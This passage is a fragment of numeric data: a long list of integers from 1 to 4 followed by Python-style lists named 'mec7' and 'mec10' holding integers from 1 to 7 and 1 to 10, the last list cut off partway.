2, 1, 1, 1, 1, 1, 1, 3, 1, 4, 2, 1, 3, 4, 3, 1, 2, 3, 2, 3, 2, 4, 4, 3, 2, 2, 1, 1, 2, 4, 3, 1, 2, 3, 3, 3, 2, 3, 3, 4, 2, 1, 1, 1, 1, 1, 2, 3, 2, 1, 1, 1, 3, 4, 2, 4, 4, 1, 3, 3, 1, 3, 3, 4, 1, 4, 3, 1, 4, 1, 2, 2, 4, 1, 1, 2, 4, 3, 4, 3, 1, 4, 1, 4, 4, 3, 3, 2, 2, 4, 1, 2, 4, 4, 1, 1, 1, 3, 1, 1, 4, 1, 1, 4, 3, 3, 4, 1, 3, 1, 3, 3, 3, 3, 3, 3, 4, 3, 3, 2, 1, 2, 2, 1, 2, 2, 3, 4, 1, 3, 4, 1, 3, 2, 2, 3, 2, 4, 1, 4, 4, 3, 4, 4, 4, 2, 1, 2, 3, 3, 1, 2, 3, 4, 4, 1, 3, 2, 4, 3, 4, 4, 2, 1, 4, 2, 4, 3, 4, 3, 3, 1, 2, 1, 2, 3, 4, 2, 4, 3, 3, 4, 2, 2, 1, 4, 1, 3, 4, 3, 4, 3, 1, 2, 3, 2, 3, 4, 1, 2, 3, 4, 2, 3, 3, 4, 4, 2, 2, 2, 3, 4, 3, 2, 2, 4, 3, 3, 1, 2, 1, 3, 2, 4, 4, 3, 2, 3, 2, 2, 4, 3, 2, 1, 2, 4, 4, 3, 4, 4, 3, 4, 4, 4, 3, 2, 4, 1, 3, 3, 3, 2, 3, 4, 4, 2, 3, 2, 3, 2, 1, 1, 2, 3, 2, 3, 1, 3, 3, 3, 4, 2, 3, 2, 3, 1, 3, 3, 2, 2, 2, 1, 1, 1, 1, 2, 1, 1, 2, 1, 3, 2, 4, 4, 2, 4, 1, 2, 3, 3, 3, 2, 3, 3, 1, 1, 2, 3, 1, 2, 3, 3, 4, 2, 3, 2, 2, 4, 4, 1, 4, 1, 3, 2, 3, 1, 3, 3, 4, 4, 2, 2, 3, 4, 1, 3, 2, 1, 1, 3, 4, 4, 2, 3, 4, 1, 4, 4, 1, 3, 1, 1, 2, 3, 1, 2, 4, 1, 4, 1, 1, 1, 4, 1, 2, 1, 1, 3, 4, 4, 2, 1, 4, 2, 1, 4, 1, 4, 2, 4, 3, 4, 1, 1, 4, 3, 4, 2, 3, 4, 4, 4, 3, 4, 2, 1, 1, 3, 2, 4, 4, 2, 3, 3, 3, 4, 3, 2, 1, 1, 2, 3, 3, 2, 2, 2, 1, 3, 2, 4, 4, 4, 1, 4, 2, 4, 1, 1, 3, 3, 2, 4, 4, 1, 1, 4, 4, 1, 3, 3, 1, 2, 4, 3, 1, 3, 4, 2, 1, 3, 1, 1, 4, 2, 3, 4, 3, 3, 2, 1, 3, 1, 1, 4, 3, 4, 2, 3, 1, 1, 3, 2, 3, 3, 1, 2, 3, 1, 3, 4, 2, 2, 1, 1, 4, 4, 3, 1, 1, 2, 3, 4, 4, 4, 4, 3, 1, 1, 3, 1, 1, 2, 3, 4, 4, 3, 1, 1, 4, 4, 1, 3, 3, 2, 1, 4, 4, 3, 3, 3, 2, 4, 2, 2, 2, 4, 4, 2, 3, 3, 3, 1, 4, 2, 3, 2, 1, 4, 3, 3, 1, 1, 2, 1, 4, 1, 3, 3, 4, 4, 4, 3, 4, 2, 2, 3, 4, 1, 2, 4, 3, 3, 3, 1, 2, 1, 4, 4, 4, 2, 2, 1, 2, 4, 4, 4, 4, 4, 1, 1, 3, 4, 2, 1, 3, 4, 2, 2, 1, 3, 2, 4, 1, 4, 2, 1, 1, 2, 4, 1, 2, 2, 2, 3, 1, 1, 4, 1, 3, 4, 1, 4, 2, 4, 1, 3, 2, 4, 2, 4, 1, 1, 2, 1, 4, 3, 1, 4, 4, 2, 3, 1, 4, 2, 4, 1, 1, 3, 1, 1, 2, 1, 3, 1, 4, 3, 4, 4, 3, 2, 2, 1, 3, 2, 2, 2, 1, 3, 1, 2, 3, 2, 1, 1, 2, 1, 2, 2, 3, 2, 1, 3, 3, 2, 2, 3, 2, 2, 4, 3, 3, 4, 2, 2, 2, 3, 3, 4, 4, 3, 2, 1, 3, 1, 4, 4, 1, 1, 1, 1, 1, 3, 1, 1, 1, 4, 1, 2, 1, 3, 2, 4, 4, 2, 4, 4, 3, 2, 2, 3, 1, 4, 3, 4, 3, 3, 2, 4, 4, 4, 3, 2, 4, 4, 4, 3, 2, 4, 4, 4, 4, 3, 1, 2, 4, 2, 4, 2, 4, 3, 4, 1, 3, 2, 3, 3, 3, 2, 1, 3, 3, 2, 3, 4, 2, 1, 2, 1, 4, 4, 2, 1, 2, 4, 4, 1, 3, 4, 4, 3, 2, 4, 3, 3, 4, 3, 2, 2, 3, 4, 3, 3, 1, 1, 4, 4, 3, 2, 2, 3, 2, 1, 1, 4, 1, 2, 3, 4, 1, 4, 1, 1, 3, 3, 4, 2, 4, 2, 2, 1, 3, 2, 3, 4, 4, 3, 2, 4, 1, 3, 1, 3, 2, 1, 3, 3, 2, 4, 2, 3, 1, 4, 4, 2, 2, 1, 4, 4, 3, 4, 1, 4, 2, 2, 2, 3, 1, 4, 3, 1, 3, 2, 4, 4, 2, 4, 4, 1, 4, 1, 3, 1, 3, 2, 3, 1, 3, 2, 2, 1, 1, 3, 3, 2, 2, 2, 1, 2, 1, 1, 2, 4, 1, 1, 3, 1, 3, 3, 4, 1, 4, 3, 1, 1, 3, 2, 2, 2, 2, 3, 1, 1, 2, 1, 4, 4, 4, 2, 4, 3, 3, 3, 4, 3, 3, 3, 4, 4, 2, 4, 3, 3, 2, 4, 4, 3, 2, 4, 3, 4, 2, 4, 2, 4, 4, 4, 2, 4, 3, 3, 1, 4, 4, 2, 1, 4, 1, 1, 1, 1, 4, 2, 3, 3, 4, 1, 4, 4, 4, 4, 2, 2, 1, 4, 2, 1, 2, 3, 4, 1, 3, 3, 2, 2, 2, 1, 4, 3, 3, 1, 1, 1, 3, 3, 2, 3, 3, 3, 4, 1, 4, 3, 1, 1, 3, 4, 1, 3, 1, 2, 4, 3, 1, 1, 2, 1, 1, 2, 4, 1, 1, 3, 2, 1, 3, 4, 3, 3, 4, 1, 2, 1, 4, 2, 3, 1, 3, 3, 4, 2, 3, 1, 1, 3, 1, 3, 4, 2, 1, 1, 2, 4, 3, 2, 1, 3, 4, 1, 2, 1, 1, 4, 3, 1, 4, 3, 3, 4, 2, 4, 2, 3, 4, 2, 3, 3, 1, 1, 2, 1, 3, 4, 3, 4, 3, 2, 2, 1, 1, 3, 1, 4, 4, 3, 2, 4, 3, 1, 4, 3, 2, 4, 2, 2, 3, 4, 4, 2, 4, 2, 2, 2, 1, 1, 1, 1, 2, 3, 4, 2, 4, 3, 4, 2, 4, 3, 1, 4, 4, 2, 2, 1, 2, 4, 3, 3, 1, 3, 3, 2, 3, 2, 3, 3, 4, 1, 3, 2, 3, 2, 2, 2, 4, 1, 3, 2, 3, 1, 3, 2, 2, 3, 1, 4, 3, 4, 2, 1, 1, 2, 1, 3, 1, 3, 2, 2, 4, 1, 4, 3, 2, 2, 4, 4, 4, 1, 3, 1, 3, 3, 4, 1, 2, 2, 1, 3, 3, 2, 4, 1, 2, 1, 3, 1, 3, 3, 2, 3, 3, 3, 1, 4, 2, 1, 2, 2, 2, 1, 3, 2, 1, 3, 1, 4, 4, 4, 3, 1, 4, 1, 1, 2, 1, 4, 2, 4, 3, 1, 2, 2, 4, 1, 3, 2, 2, 2, 1, 1, 4, 1, 1, 1, 2, 3, 2, 3, 1, 2, 1, 4, 4, 4, 3, 3, 2, 1, 1, 3, 4, 4, 4, 3, 2, 4, 3, 3, 4, 1, 4, 2, 2, 2, 3, 4, 2, 3, 2, 3, 1, 1, 3, 2, 3, 4, 2, 3, 1, 4, 3, 4, 2, 2, 4, 4, 1, 1, 2, 3, 3, 2, 3, 1, 1, 1, 4, 1, 2, 1, 3, 3, 1, 1, 3, 3, 3, 4, 4, 3, 1, 1, 4, 4, 3, 3, 4, 1, 1, 1, 2, 2, 1, 2, 3, 1, 2, 3, 3, 2, 3, 4, 2, 4, 3, 3, 3, 3, 2, 4, 1, 1, 1, 3, 4, 1, 4, 1, 3, 1, 1, 3, 1, 1, 2, 1, 3, 1, 4, 2, 4, 4, 1, 3, 4, 1, 2, 3, 3, 2, 4, 2, 4, 2, 4, 4, 2, 2, 2, 3, 2, 3, 2, 1, 3, 4, 3, 4, 2, 1, 1, 2, 3, 2, 1, 1, 4, 4, 4, 3, 3, 4, 3, 4, 4, 2, 3, 1, 3, 4, 4, 3, 2, 2, 1, 4, 3, 1, 3, 1, 3, 3, 3, 4, 1, 4, 2, 2, 2, 1, 3, 2, 2, 3, 3, 4, 1, 1, 3, 2, 2, 3, 1, 3, 1, 4, 4, 2, 4, 1, 4, 2, 2, 2, 1, 3, 2, 3, 4, 1, 1, 1, 1, 1, 3, 1, 1, 4, 4, 2, 2, 1, 3, 3, 2, 1, 1, 2, 3, 1, 2, 4, 3, 4, 4, 2, 2, 2, 2, 2, 2, 3, 4, 3, 2, 2, 3, 3, 3, 3, 2, 4, 2, 2, 1, 4, 4, 1, 2, 4, 2, 1, 4, 3, 1, 3, 4, 1, 4, 4, 1, 4, 1, 3, 4, 3, 4, 2, 1, 2, 2, 3, 3, 3, 1, 1, 2, 4, 3, 1, 2, 1, 4, 2, 4, 4, 1, 3, 1, 1, 4, 1, 4, 1, 3, 4, 4, 1, 2, 4, 2, 4, 3, 4, 4, 2, 1, 3, 3, 1, 4, 3, 3, 1, 1, 3, 1, 4, 4, 2, 2, 3, 4, 4, 3, 4, 3, 4, 3, 1, 2, 4, 2, 3, 1, 4, 1, 2, 1, 3, 1, 2, 2, 4, 2, 1, 4, 1, 2, 3, 1, 2, 2, 1, 4, 4, 4, 4, 1, 1, 4, 4, 2, 1, 4, 1, 4, 3, 1, 3, 3, 4, 2, 3, 2, 4, 1, 1, 2, 3, 1, 4, 3, 4, 4, 2, 1, 4, 1, 4, 1, 4, 2, 1, 2, 1, 4, 1, 2, 3, 1, 1, 3, 3, 3, 3, 2, 4, 3, 4, 3, 4, 4, 2, 1, 4, 4, 1, 3, 2, 3, 2, 1, 1, 2, 2, 1, 2, 2, 3, 3, 2, 3, 1, 4, 3, 2, 4, 3, 1, 3, 1, 1, 3, 3, 1, 3, 4, 4, 3, 3, 1, 4, 1, 3, 1, 1, 2, 2, 1, 1, 4, 4, 1, 3, 2, 2, 4, 2, 4, 3, 4, 3, 3, 2, 2, 2, 3, 1, 1, 2, 1, 2, 2, 2, 3, 4, 1, 2, 1, 4, 4, 4, 4, 2, 1, 2, 1, 3, 3, 2, 1, 3, 3, 2, 2, 1, 1, 3, 4, 1, 4, 2, 2, 4, 2, 2, 3, 3, 4, 2, 1, 3, 4, 3, 3, 4, 3, 1, 1, 1, 1, 2, 4, 4, 2, 3, 1, 1, 4, 2, 1, 4, 4, 2, 2, 2, 2, 4, 1, 4, 2, 2, 1, 3, 4, 1, 2, 4, 3, 2, 1, 3, 4, 3, 2, 2, 2, 2, 3, 4, 1, 1, 2, 3, 4, 4, 2, 3, 1, 2, 3, 2, 3, 3, 2, 2, 3, 3, 2, 3, 2, 3, 4, 1, 3, 4, 3, 2, 2, 3, 4, 2, 4, 2, 3, 3, 1, 1, 4, 2, 4, 2, 4, 3, 4, 1, 2, 4, 3, 2, 2, 4, 3, 4, 1, 1, 4, 2, 1, 3, 3, 4, 2, 4, 2, 2, 4, 3, 1, 2, 4, 3, 1, 3, 4, 1, 1, 2, 2, 1, 2, 1, 4, 4, 2, 1, 1, 4, 4, 1, 3, 2, 3, 3, 4, 1, 3, 2, 4, 3, 3, 4, 2, 4, 4, 1, 1, 2, 2, 2, 2, 1, 3, 4, 1, 3, 4, 4, 1, 1, 3, 2, 1, 3, 4, 3, 3, 3, 2, 4, 4, 3, 3, 2, 2, 3, 1, 2, 1, 3, 4, 1, 2, 1, 2, 1, 3, 4, 4, 3, 4, 3, 4, 2, 3, 1, 3, 4, 1, 2, 3, 1, 1, 2, 1, 3, 1, 3, 3, 4, 2, 3, 1, 2, 1, 4, 2, 1, 3, 4, 1, 2, 2, 3, 1, 1, 4, 2, 2, 4, 4, 4, 1, 2, 2, 2, 2, 3, 4, 3, 1, 2, 2, 4, 3, 3, 2, 1, 4, 3, 4, 2, 2, 3, 3, 3, 1, 3, 3, 1, 2, 4, 3, 3, 4, 4, 2, 2, 3, 1, 1, 1, 4, 3, 4, 1, 2, 2, 3, 4, 4, 4, 4, 2, 4, 1, 3, 2, 1, 1, 3, 4, 4, 4, 4, 3, 3, 2, 3, 3, 1, 2, 4, 1, 4, 2, 2, 2, 4, 2, 1, 4, 4, 1, 2, 4, 2, 4, 2, 1, 2, 2, 4, 1, 4, 1, 1, 4, 2, 4, 2, 2, 1, 1, 2, 4, 4, 2, 2, 1, 2, 4, 2, 4, 2, 2, 4, 2, 4, 4, 2, 4, 4, 4, 2, 4, 4, 2, 4, 4, 2, 4, 2, 2, 2, 4, 4, 4, 2, 4, 4]
mec7 = [3, 4, 3, 7, 2, 7, 6, 1, 5, 7, 5, 1, 7, 6, 2, 6, 7, 2, 7, 2, 3, 6, 3, 6, 5, 3, 5, 1, 4, 4, 2, 5, 5, 3, 6, 2, 5, 7, 4, 3, 6, 4, 5, 4, 1, 5, 3, 3, 1, 3, 6, 1, 7, 3, 2, 5, 1, 2, 5, 4, 3, 2, 6, 6, 3, 6, 4, 1, 2, 2, 1, 7, 1, 7, 1, 6, 7, 5, 5, 4, 6, 4, 1, 5, 6, 3, 4, 3, 6, 2, 5, 5, 5, 2, 7, 2, 5, 1, 6, 6, 1, 3, 5, 6, 5, 4, 1, 2, 3, 1, 5, 7, 5, 3, 6, 6, 5, 1, 3, 1, 5, 6, 6, 1, 7, 2, 6, 3, 1, 7, 3, 7, 7, 6, 5, 6, 5, 6, 2, 5, 1, 2, 5, 4, 4, 1, 2, 5, 1, 7, 3, 5, 7, 2, 6, 4, 4, 6, 5, 6, 5, 6, 1, 1, 7, 6, 2, 5, 1, 7, 2, 5, 1, 4, 7, 6, 5, 4, 7, 6, 4, 7, 6, 4, 1, 7, 7, 3, 1, 1, 1, 1, 5, 3, 7, 6, 5, 3, 1, 1, 4, 1, 1, 2, 7, 3, 6, 2, 7, 6, 7, 4, 3, 3, 3, 2, 5, 1, 5, 2, 6, 3, 4, 2, 4, 6, 1, 1, 2, 5, 1, 1, 2, 5, 1, 5, 2, 7, 7, 1, 5, 6, 2, 3, 6, 5, 5, 5, 3, 2, 3, 5, 7, 7, 2, 1, 1, 7, 2, 6, 3, 4, 3, 7, 5, 5, 1, 2, 5, 2, 4, 2, 7, 2, 1, 4, 7, 7, 2, 1, 4, 3, 3, 1, 7, 5, 3, 6, 1, 5, 5, 3, 4, 2, 6, 3, 5, 1, 3, 6, 4, 6, 2, 3, 2, 2, 7, 7, 3, 6, 7, 7, 4, 1, 3, 6, 3, 4, 5, 6, 2, 5, 5, 5, 7, 2, 1, 4, 3, 1, 4, 7, 2, 4, 3, 7, 5, 3, 7, 3, 2, 3, 1, 3, 3, 2, 1, 7, 3, 4, 1, 6, 2, 2, 2, 7, 7, 3, 3, 3, 7, 3, 2, 5, 5, 7, 2, 6, 5, 3, 7, 2, 2, 6, 2, 6, 5, 7, 4, 2, 2, 2, 4, 5, 4, 2, 4, 6, 4, 4, 4, 1, 7, 6, 2, 4, 2, 7, 1, 3, 4, 5, 1, 6, 1, 2, 7, 4, 2, 7, 6, 6, 6, 7, 4, 5, 1, 6, 7, 4, 3, 6, 5, 4, 2, 1, 5, 7, 3, 6, 4, 4, 5, 4, 7, 7, 3, 6, 3, 3, 2, 4, 5, 1, 6, 1, 1, 5, 7, 7, 2, 7, 5, 6, 1, 4, 5, 5, 3, 3, 4, 7, 4, 5, 2, 2, 6, 6, 7, 1, 6, 7, 7, 3, 4, 1, 5, 1, 3, 3, 7, 4, 7, 4, 5, 6, 7, 1, 2, 4, 3, 7, 5, 2, 3, 6, 2, 2, 4, 2, 4, 4, 7, 1, 6, 7, 4, 2, 6, 5, 2, 1, 1, 3, 1, 2, 6, 1, 3, 4, 4, 3, 3, 1, 4, 7, 7, 1, 3, 3, 3, 6, 4, 1, 6, 6, 2, 4, 2, 4, 3, 5, 6, 3, 5, 1, 6, 6, 7, 2, 7, 5, 6, 4, 6, 1, 5, 2, 4, 6, 7, 6, 3, 5, 3, 5, 3, 1, 2, 1, 7, 2, 6, 7, 4, 4, 4, 1, 7, 3, 7, 3, 6, 2, 5, 6, 1, 3, 6, 5, 4, 4, 1, 1, 3, 3, 5, 6, 4, 5, 7, 6, 2, 6, 4, 7, 2, 6, 5, 7, 6, 3, 4, 5, 4, 1, 3, 5, 7, 7, 3, 3, 1, 3, 7, 4, 7, 7, 2, 4, 4, 6, 7, 6, 1, 7, 4, 2, 6, 4, 6, 6, 2, 4, 5, 4, 6, 5, 7, 1, 5, 1, 4, 7, 1, 5, 1, 5, 4, 7, 3, 7, 5, 7, 1, 4, 2, 6, 6, 3, 7, 1, 3, 6, 4, 6, 7, 1, 4, 4, 3, 7, 2, 7, 2, 1, 6, 4, 2, 4, 4, 4, 1, 4, 4, 6, 3, 6, 6, 2, 4, 5, 6, 2, 4, 1, 6, 3, 1, 3, 1, 2, 2, 3, 2, 7, 6, 4, 3, 2, 1, 4, 1, 1, 7, 4, 2, 4, 2, 4, 6, 7, 2, 3, 6, 7, 1, 6, 1, 3, 7, 4, 4, 1, 4, 4, 6, 1, 1, 2, 7, 2, 2, 1, 5, 7, 5, 1, 1, 6, 4, 1, 7, 6, 5, 4, 5, 3, 2, 4, 1, 7, 7, 6, 7, 4, 4, 3, 4, 6, 2, 4, 6, 7, 1, 2, 5, 7, 6, 7, 4, 6, 1, 6, 6, 7, 2, 6, 6, 1, 1, 4, 7, 7, 2, 2, 4, 7, 2, 7, 7, 3, 1, 1, 3, 1, 2, 3, 3, 6, 6, 6, 3, 5, 5, 2, 4, 3, 7, 7, 2, 7, 2, 1, 7, 3, 4, 1, 5, 3, 6, 5, 6, 3, 5, 6, 2, 6, 6, 6, 4, 2, 3, 7, 1, 3, 6, 6, 3, 1, 1, 7, 3, 5, 2, 6, 2, 5, 7, 5, 1, 5, 1, 7, 3, 4, 7, 5, 6, 4, 3, 6, 2, 2, 1, 5, 6, 1, 7, 4, 1, 2, 2, 2, 4, 6, 2, 7, 7, 7, 7, 5, 6, 4, 7, 4, 6, 6, 5, 5, 2, 2, 6, 1, 2, 5, 1, 1, 7, 7, 7, 5, 1, 2, 4, 4, 5, 5, 7, 3, 7, 5, 3, 7, 2, 4, 4, 3, 4, 4, 2, 5, 2, 4, 5, 7, 4, 6, 6, 6, 7, 3, 7, 2, 4, 6, 6, 5, 7, 5, 2, 6, 2, 4, 3, 5, 6, 7, 2, 1, 3, 3, 1, 4, 5, 6, 4, 5, 7, 3, 1, 4, 1, 7, 6, 4, 7, 2, 4, 7, 6, 1, 4, 6, 7, 3, 6, 6, 3, 1, 1, 3, 3, 7, 3, 3, 1, 7, 4, 1, 4, 3, 5, 6, 6, 4, 7, 1, 5, 4, 5, 2, 1, 5, 7, 6, 4, 3, 3, 6, 7, 7, 1, 2, 7, 1, 5, 2, 2, 1, 7, 5, 4, 6, 6, 1, 4, 4, 1, 6, 2, 1, 5, 1, 2, 6, 6, 4, 3, 6, 2, 7, 5, 3, 2, 7, 5, 6, 4, 4, 7, 1, 5, 6, 7, 4, 3, 7, 5, 3, 3, 1, 5, 4, 6, 2, 4, 7, 7, 2, 1, 5, 7, 7, 3, 4, 7, 6, 6, 1, 5, 7, 5, 5, 3, 4, 7, 5, 7, 7, 2, 6, 4, 4, 1, 4, 2, 4, 4, 5, 3, 4, 6, 4, 7, 1, 7, 5, 5, 1, 7, 6, 3, 5, 7, 5, 6, 2, 7, 5, 3, 5, 4, 2, 7, 7, 7, 2, 7, 1, 2, 3, 1, 2, 1, 2, 4, 1, 1, 4, 5, 6, 4, 7, 1, 4, 5, 7, 5, 1, 3, 3, 3, 1, 5, 4, 6, 3, 7, 3, 4, 3, 5, 4, 1, 3, 3, 3, 2, 5, 3, 5, 1, 4, 2, 3, 1, 3, 6, 5, 3, 1, 3, 1, 5, 5, 1, 1, 5, 2, 5, 1, 2, 3, 5, 6, 3, 3, 3, 1, 5, 5, 1, 7, 6, 6, 6, 6, 6, 7, 1, 2, 3, 7, 5, 2, 2, 3, 2, 6, 3, 5, 6, 7, 4, 1, 4, 6, 5, 5, 4, 4, 7, 2, 6, 5, 3, 5, 4, 7, 6, 3, 6, 2, 5, 7, 7, 7, 4, 7, 2, 5, 7, 5, 1, 3, 1, 7, 3, 2, 3, 4, 2, 3, 6, 3, 7, 6, 5, 3, 4, 3, 5, 1, 1, 5, 7, 3, 1, 6, 1, 1, 4, 2, 1, 6, 3, 5, 4, 6, 2, 7, 1, 3, 3, 3, 5, 5, 4, 5, 7, 3, 7, 2, 7, 1, 5, 3, 6, 5, 7, 7, 1, 3, 7, 6, 6, 6, 5, 2, 7, 3, 5, 1, 6, 5, 2, 7, 3, 1, 6, 2, 1, 2, 2, 4, 6, 3, 3, 2, 5, 7, 7, 5, 6, 1, 1, 1, 6, 4, 4, 2, 1, 3, 5, 4, 4, 4, 2, 4, 4, 1, 2, 3, 1, 3, 6, 7, 5, 6, 3, 7, 3, 7, 2, 5, 6, 4, 4, 3, 5, 7, 1, 2, 2, 6, 3, 1, 5, 2, 1, 6, 5, 3, 7, 1, 7, 7, 6, 3, 5, 7, 4, 1, 2, 4, 6, 4, 5, 7, 3, 3, 1, 4, 7, 6, 4, 7, 7, 4, 3, 7, 7, 5, 6, 7, 2, 3, 3, 3, 4, 4, 7, 6, 3, 4, 1, 2, 6, 6, 3, 2, 6, 2, 5, 1, 6, 6, 2, 2, 7, 7, 1, 3, 6, 6, 6, 7, 1, 5, 5, 5, 4, 2, 7, 2, 3, 2, 2, 2, 5, 5, 1, 3, 5, 6, 3, 5, 7, 1, 3, 1, 1, 1, 5, 4, 5, 5, 6, 2, 4, 6, 4, 1, 7, 4, 1, 5, 4, 5, 3, 3, 7, 1, 5, 7, 4, 6, 5, 1, 3, 1, 4, 3, 1, 6, 3, 4, 4, 7, 2, 1, 1, 7, 4, 3, 6, 7, 4, 1, 1, 7, 2, 6, 1, 1, 2, 3, 5, 4, 5, 7, 7, 1, 2, 1, 1, 4, 4, 5, 2, 4, 5, 2, 1, 3, 2, 7, 6, 4, 7, 4, 2, 5, 1, 3, 7, 4, 6, 6, 6, 6, 3, 4, 4, 6, 1, 7, 1, 4, 4, 7, 7, 2, 3, 5, 7, 2, 3, 1, 6, 4, 2, 6, 7, 2, 5, 6, 2, 7, 5, 2, 6, 5, 3, 1, 1, 4, 1, 7, 2, 5, 3, 3, 2, 3, 1, 2, 2, 5, 1, 1, 3, 5, 6, 6, 2, 7, 2, 5, 7, 6, 2, 5, 2, 1, 5, 4, 6, 7, 5, 5, 1, 4, 3, 3, 3, 6, 2, 2, 4, 4, 4, 5, 6, 3, 7, 1, 5, 7, 7, 6, 1, 3, 6, 7, 1, 3, 7, 3, 1, 2, 4, 1, 6, 7, 4, 1, 6, 1, 5, 2, 3, 7, 2, 2, 3, 3, 4, 7, 3, 1, 5, 2, 2, 5, 6, 1, 2, 3, 2, 6, 5, 7, 1, 5, 2, 4, 5, 4, 7, 5, 2, 1, 4, 2, 2, 2, 2, 4, 2, 3, 7, 5, 7, 7, 4, 5, 5, 3, 5, 5, 2, 5, 2, 6, 7, 2, 6, 2, 5, 4, 1, 3, 1, 2, 1, 4, 1, 1, 4, 4, 7, 6, 4, 1, 1, 2, 7, 2, 2, 2, 1, 1, 1, 3, 5, 1, 3, 4, 1, 6, 6, 4, 6, 2, 3, 3, 6, 5, 3, 7, 3, 2, 6, 2, 7, 1, 5, 7, 7, 2, 6, 5, 3, 2, 7, 4, 5, 6, 1, 1, 1, 2, 1, 6, 1, 6, 4, 4, 2, 2, 5, 5, 3, 7, 3, 1, 2, 2, 7, 5, 2, 3, 2, 1, 2, 1, 7, 7, 7, 5, 3, 5, 7, 7, 1, 1, 7, 5, 1, 1, 2, 7, 6, 5, 3, 7, 5, 5, 7, 5, 3, 4, 2, 6, 5, 3, 1, 1, 7, 6, 1, 7, 6, 6, 5, 6, 5, 5, 1, 3, 3, 4, 7, 3, 4, 4, 1, 2, 5, 7, 6, 1, 4, 7, 2, 6, 6, 3, 6, 7, 2, 7, 1, 6, 1, 3, 6, 3, 3, 5, 6, 7, 7, 5, 1, 3, 4, 7, 7, 2, 4, 7, 7, 4, 2, 4, 5, 2, 4, 4, 7, 5, 7, 4, 2, 6, 4, 5, 3, 6, 2, 7, 4, 6, 3, 4, 2, 1, 7, 4, 4, 7, 4, 2, 2, 4, 1, 7, 4, 6, 3, 4, 4, 4, 1, 5, 1, 2, 4, 6, 2, 2, 6, 1, 5, 7, 5, 1, 4, 4, 6, 1, 5, 1, 1, 7, 2, 1, 3, 7, 6, 5, 5, 6, 4, 6, 1, 1, 1, 7, 5, 3, 5, 2, 5, 5, 1, 6, 2, 1, 6, 2, 1, 6, 7, 6, 3, 2, 1, 2, 6, 1, 2, 4, 1, 1, 3, 6, 4, 6, 6, 2, 3, 4, 4, 1, 4, 5, 2, 2, 6, 4, 6, 5, 3, 7, 7, 1, 6, 2, 2, 7, 1, 2, 6, 3, 6, 6, 4, 1, 3, 3, 6, 2, 5, 1, 1, 5, 2, 2, 7, 2, 4, 7, 1, 1, 3, 3, 1, 1, 2, 6, 1, 2, 3, 5, 7, 5, 6, 6, 2, 4, 2, 6, 6, 7, 5, 4, 5, 2, 6, 2, 1, 5, 3, 5, 6, 3, 4, 4, 6, 4, 3, 1, 4, 1, 6, 7, 1, 4, 3, 5, 7, 7, 3, 1, 5, 6, 3, 5, 7, 5, 4, 5, 7, 5, 2, 5, 6, 5, 3, 7, 7, 2, 3, 3, 4, 6, 5, 5, 6, 1, 2, 2, 7, 4, 6, 1, 6, 2, 6, 1, 6, 5, 7, 4, 6, 5, 5, 4, 6, 6, 3, 4, 6, 2, 7, 5, 2, 5, 6, 5, 6, 2, 4, 4, 6, 4, 4, 1, 5, 3, 5, 3, 7, 2, 7, 4, 4, 5, 3, 4, 1, 3, 3, 5, 2, 3, 3, 2, 4, 2, 1, 2, 7, 2, 7, 4, 3, 1, 3, 7, 6, 1, 5, 5, 3, 1, 3, 2, 7, 2, 4, 2, 1, 6, 3, 6, 7, 7, 3, 1, 6, 6, 1, 6, 1, 3, 3, 5, 2, 4, 3, 7, 3, 2, 2, 3, 2, 5, 4, 2, 5, 2, 7, 4, 4, 6, 6, 5, 6, 6, 1, 1, 4, 3, 1, 6, 1, 3, 5, 6, 1, 6, 1, 1, 1, 4, 1, 4, 4, 3, 3, 4, 1, 6, 1, 6, 7, 6, 2, 3, 4, 5, 2, 3, 5, 2, 1, 3, 7, 4, 5, 4, 7, 7, 1, 7, 5, 6, 5, 4, 6, 4, 7, 2, 1, 6, 5, 1, 3, 5, 4, 7, 2, 2, 2, 7, 1, 7, 1, 1, 1, 7, 3, 6, 7, 6, 3, 3, 6, 1, 5, 5, 5, 3, 3, 2, 4, 2, 6, 5, 4, 5, 7, 3, 1, 2, 1, 3, 6, 5, 1, 6, 4, 3, 1, 6, 1, 5, 1, 7, 7, 2, 1, 1, 3, 6, 1, 3, 7, 5, 1, 3, 1, 5, 4, 4, 1, 7, 1, 4, 4, 4, 2, 4, 6, 3, 2, 7, 3, 2, 1, 3, 2, 6, 6, 4, 2, 6, 7, 6, 7, 6, 3, 5, 6, 3, 7, 5, 3, 6, 6, 2, 6, 2, 4, 2, 3, 6, 7, 5, 2, 4, 3, 4, 3, 2, 7, 7, 3, 4, 7, 5, 2, 7, 3, 6, 2, 7, 3, 7, 4, 3, 7, 7, 7, 7, 3, 4, 6, 5, 5, 4, 6, 5, 2, 4, 4, 2, 4, 5, 3, 5, 4, 3, 2, 4, 3, 3, 3, 5, 4, 5, 6, 5, 6, 2, 4, 4, 6, 5, 2, 4, 2, 2, 6, 4, 2, 5, 4, 2, 4, 5, 2, 3, 5, 6, 3, 5, 5, 4, 3, 5, 2, 2, 3, 5, 2, 3, 3, 4, 3, 3, 2, 4, 2, 2, 3, 2, 4, 2, 4, 5, 5, 4, 3, 5, 3, 4, 4, 5, 2, 2, 4, 2, 5, 3, 5, 3, 4, 3, 2, 4, 2, 3, 3, 3, 5, 2, 3, 3, 4, 2, 3, 5, 4, 3, 5, 2, 3, 2, 3, 4, 3, 2, 5, 5]
mec10 = [2, 9, 2, 10, 3, 1, 6, 7, 2, 10, 4, 5, 8, 3, 7, 4, 2, 4, 6, 9, 1, 4, 7, 1, 10, 4, 2, 1, 6, 4, 3, 1, 6, 3, 8, 9, 7, 7, 8, 3, 7, 7, 5, 10, 4, 10, 10, 8, 1, 4, 3, 9, 9, 8, 10, 9, 7, 7, 1, 3, 5, 6, 9, 5, 1, 3, 6, 7, 8, 6, 7, 6, 7, 4, 9, 6, 10, 6, 10, 2, 6, 4, 4, 6, 8, 6, 3, 4, 3, 6, 8, 2, 6, 2, 7, 1, 10, 1, 8, 7, 7, 3, 4, 5, 4, 4, 5, 5, 3, 7, 3, 6, 5, 4, 3, 10, 5, 1, 8, 6, 7, 1, 3, 10, 2, 10, 2, 1, 6, 9, 4, 5, 2, 7, 10, 8, 10, 7, 6, 4, 1, 10, 4, 4, 6, 3, 5, 7, 2, 10, 5, 1, 7, 3, 3, 1, 2, 1, 10, 2, 3, 8, 9, 8, 7, 8, 9, 2, 4, 6, 10, 7, 7, 7, 4, 3, 2, 7, 10, 1, 7, 4, 7, 2, 3, 7, 6, 4, 8, 4, 1, 5, 9, 8, 10, 6, 5, 1, 5, 10, 9, 6, 10, 3, 9, 7, 10, 4, 4, 1, 4, 1, 1, 5, 4, 6, 